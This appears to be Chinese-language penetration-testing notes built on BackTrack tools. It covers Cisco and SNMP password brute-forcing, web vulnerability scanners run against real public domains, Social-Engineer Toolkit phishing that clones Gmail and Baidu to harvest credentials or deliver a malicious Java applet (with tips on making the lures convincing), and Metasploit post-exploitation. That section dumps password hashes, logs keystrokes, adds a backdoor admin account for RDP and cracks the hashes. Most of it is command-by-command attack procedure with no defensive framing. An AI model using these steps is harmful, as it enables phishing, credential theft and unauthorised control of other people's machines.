漏洞发现
第一部分Cisco工具
1. CAT安全审计工具,扫描Cissco路由器的一般性漏洞
./CAT -h 192.168.8.254 -w lists/community -a lists/passwords
2. Cisco Passwd Scanner, 用于发现拥有默认telnet密码“Cisco”的Cisco设备
./ciscos 192.168.8.1 3 -t 4 -C 10
第二部SNM扫描工具
1. ADMSnmp, ADMSnmp用于暴力PJSNMP community字串,使用预先定义的“wordlist”
./ADMsnmp 192.168.8.34 -wordf snmp.passwd
2. Snmp Enum在获得community后,可以使用snmp enum获取大量关于Cisco,windows和linux的信息
./snmpenum.pl 192.168.8.34 private cisco.txt
第三部分HTTP工具
1. Burp Suite分析和攻击web运用
java -jar burpsuite_v1.4.jar
Proxy 代理端口可以编辑 intruder 选项卡选择intruder on 即开启代理端口为8080 更改浏览器的连接设置就可用此代理
2. Grendel Scan 网页漏洞扫描工具
/pentest/web/grendel-scan# ./grendel.sh
3. Nikto2 安全漏洞扫描工具
/pentest/web/nikto# ./nikto.pl -h jw.nwpu.edu.cn -C -p 80 -T 3478b -t 3 -D \ V -o webtest -F htm
其中 webtest里存放的扫描结果
4. w3af 特性丰富的web运用攻击和审计的框架,他协助检测和攻击
/pentest/web/w3af# ./w3af_console
参数配置
w3af>>>plugins(插件设置)
w3af/plugins>>>help
w3af/plugins>>>output console,htmlFile(插件输出设置)
w3af/plugins>>>output config htmlFile(插件文件格式设置)
w3af/plugins/output/config:htmlFile>>>set verbose True(冗余模式打开)
w3af/plugins/output/config:htmlFile>>>set fileName testreport.html(输出文件名)
w3af/plugins/output/config:htmlFile>>>back
w3af/plugins>>>output config console(插件模块设置)
w3af/plugins/output/config:console>>>set verbose False
w3af/plugins/output/config:console>>>back
w3af/plugins>>>audit htaccessMethods , osCommanding , sqli , xss(加载各种脚本)
w3af/plugins>>>back
w3af>>>target(目标地址设置)
w3af/config:target>>>set target http://xx.xx.xx.xx/
w3af/config:target>>>back
w3af>>>start(开始攻击)
5. WAFW00F 探测WAF(运用层防火墙)的工具,会返回在这个之前有什么运用级防火墙是哪个厂商的
/pentest/web/waffit# ./wafw00f.py http://www.baidu.com
6. Samrdump
/pentest/python/impacket-examples# ./samrdump.py administrator:[email protected] 445/SMB
第五部分综合漏洞发现工具Nessus
开启服务
/etc/init.d/nessusd start
打开https://localhost:8834/
用户名:cisco 密码:cisco
社会工程学工具SET
第一部分:Java Applet Attack Method(利用java的病毒攻击)
第二部分:Credential Harvester Attack Method(收集个人信息)
1. SET是一个高级的,多功能的,并且易于使用的计算机社会工程学工具集
/pentest/exploits/set/config# vi set_config (查看配置信息)
METASPLOIT_PATH=/pentest/exploits/framework3(MSF漏洞利用攻击工具路径)
ETTERCAP=ON(一个网络欺骗工具功能是否开放)
ETTERCAP_PATH=/usr/share/ettercap
ETTERCAP_DNSIFF_INTERFACE=eth1(使用DNS欺骗的网络接口)
EMAIL_PROVIDER=GMAIL(发送垃圾邮件的提供商)
SELF_SIGNED_APPLET=ON(自签名插件)
JAVA_ID_PARAM=Secure Java Applet(签名时候是哪个厂商产生的,后面这个名字写的靠谱点,让人相信会去点击)
命令
/pentest/exploits/set# ./set
然后set> 1
set> 2
set:webattack>1
set:webattack>2
set:payloads>2
set:encoding>16
set:phishing>1
set:phishing> Your gmail email address: :[email protected]
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
set:phishing> Email subject:Thank you! For your application.
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:welcome to our sites: http://192.168.8.167
Next line of the body: ^C
以上做的是克隆百度的站点,通过自己的Gmail发送邮件给被攻击者,只要他人点击http://192.168.8.167,并加载运行那个java插件secure java applet就会中招。(在WIN7和2003上点击链接,并没有弹出secure java applet插件,也许是浏览器的安全设置弄的)
如果有人中招,按Ctrl+C终止。
msf exploit(handler) > sessions –i (查看中招的主机信息)
命令/pentest/exploits/set# ./set
然后set> 1
set> 2
set:webattack>3
set:webattack>2
set:mailer>1
Enter the url to clone:https://gmail.com
1--->发送给单一目标
Send Email To:[email protected]
1-->用gmail发送邮件攻击
Your Gmail email address:[email protected]
Email password:xxxxx
Flag this message/s as high priority?[yes|no]yes(是不是高优先标签)
Email subject:(Email的标题,考你的语文水平,欺骗他让他点你的站点)
Send the message as htmal or plain? 'h' or 'p' [p]:(发送文件是以什么格式)
Enter the body of the message, hit return for a new line,Control+c when finished:(编写邮件的内容按Ctrl+C来结束)
这个只要他人点击你给的链接(最好自己有一个域名),输入用户名和密码,我们就可以知道了
应用层攻击MSF
1. 启动msfconsole 命令:msfconsole
msf>hosts (查看扫描过的主机数据库)
msf>host –d (删除这个数据库里的内容 hosts –h可以知道hosts所有用法)
msf>services (存放扫描主机开启的服务的数据库)
msf>nmap –T Aggressive –sV –n –O –v 192.168.8.1/24 (扫描这个网段)
msf>load db_autopwn (没有db_autopwn这个模块,必须先下载,然后用命令cp db_autopwn.rb /opt/framework3/msf3/plugins/ 拷贝到此处,每次使用这个模块之前load db_autopwn)
msf>db_autopwn –p –t –e (从扫描的结果中自动攻击,-I后接指定IP)
msf>sessions –i (查看攻破的主机)
msf>session –i 1 (主机ID 1,连到这个主机)
meterpreter>run hashdump (获取账号hash值)
meterpreter>ps (查看控制主机的所有进程)
meterpreter>migrate 1576 (迁移到1576进程ID,获得管理员权限)
meterpreter>keyscan_start (监视主机键盘记录)
meterpreter>keyscan_dump (显示键盘记录)
meterpreter>keyscan_stop (停止)
meterpreter>run getgui –e (开启被控制主机的远程登录服务)
meterpreter>run getgui –u cisco –p cisco (向远程主机添加拥有管理员权限的账号:cisco 密码:cisco )
然后开启远程登录软件:rdesktop 192.168.8.34:3389(被控制主机IP,port),输入账号:cisco 密码:cisco
破解刚才获取的hash值得到管理员密码:
/pentest/passwords# ophcrack –g –d ~/tables_xp_free_small –t ~/tables_xp_free_small/ -f ~/sam-new-test.
其中tables_xp_free_small是字典,sam-new-test是刚才得到的hash值